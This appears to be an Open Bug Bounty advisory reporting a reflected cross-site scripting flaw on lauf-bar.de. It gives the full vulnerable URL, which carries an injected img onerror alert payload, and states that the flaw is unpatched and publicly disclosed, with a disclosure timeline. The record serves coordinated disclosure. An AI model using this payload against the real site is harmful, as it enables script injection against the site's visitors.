lauf-bar.de XSS vulnerability

2017-03-21T20:39:00
Description| Value
---|---
ID| OBB:220205
Type| openbugbounty
Reporter| secuninja
Modified| 2017-04-05T07:14:00

Description

Vulnerable URL:
https://www.lauf-bar.de/index.php?lang=0&cl;=search&searchparam;=%22%3Etrolo%3Ci%3Etruli%3Cimg+src%3Do%20onerror=alert(%27openbugbounty%27)%3E&__cf_waf_tk__=024477002A3ELCcb5_pCWVIs9KcAgKVapnKE
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| 1694836
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 21 March, 2017 20:39 GMT
Vulnerability existence verified and confirmed| 22 March, 2017 06:57 GMT
Generic security notifications sent to website owner| 22 March, 2017 06:57 GMT
Vulnerability details disclosed by researcher| 5 April, 2017 07:14 GMT